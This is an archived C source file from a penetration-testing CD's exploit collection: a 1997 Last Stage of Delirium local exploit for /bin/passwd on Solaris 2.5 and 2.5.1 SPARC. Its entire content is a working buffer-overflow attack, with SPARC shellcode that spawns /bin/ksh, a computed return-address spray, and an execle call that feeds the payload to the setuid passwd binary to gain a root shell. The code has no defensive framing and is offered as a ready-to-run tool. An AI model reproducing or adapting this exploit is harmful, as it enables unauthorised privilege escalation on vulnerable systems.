home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / passwd.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  47 lines

  1. /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland        *://lsd-pl.net/ #*/
  2. /*## /bin/passwd                                                             #*/
  3.  
  4. #define NOPNUM 5000
  5. #define ADRNUM 3000
  6. #define ALLIGN 1
  7.  
  8. char shellcode[]=
  9.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
  10.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
  11.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
  12.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
  13.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
  14.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
  15.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
  16.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
  17.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
  18.     "\x91\xd0\x20\x08"     /* ta      8                    */
  19.     "/bin/ksh"
  20. ;
  21.  
  22. char jump[]=
  23.     "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
  24.     "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
  25. ;
  26.  
  27. static char nop[]="\x80\x1c\x40\x11";
  28.  
  29. main(int argc,char **argv){
  30.     char buffer[10000],adr[4],*b;
  31.     int i;
  32.  
  33.     printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
  34.     printf("/bin/passwd for solaris 2.5 2.5.1 sparc\n\n");
  35.  
  36.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+5688+2000;
  37.  
  38.     b=buffer;
  39.     for(i=0;i<3;i++) *b++=0xff;
  40.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
  41.     for(i=0;i<ALLIGN;i++) *b++=0xff;
  42.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
  43.     *b=0;
  44.  
  45.     execle("/bin/passwd","lsd",buffer,0,0);
  46. }
  47. /*                    www.hack.co.za           [3 August 2000]*/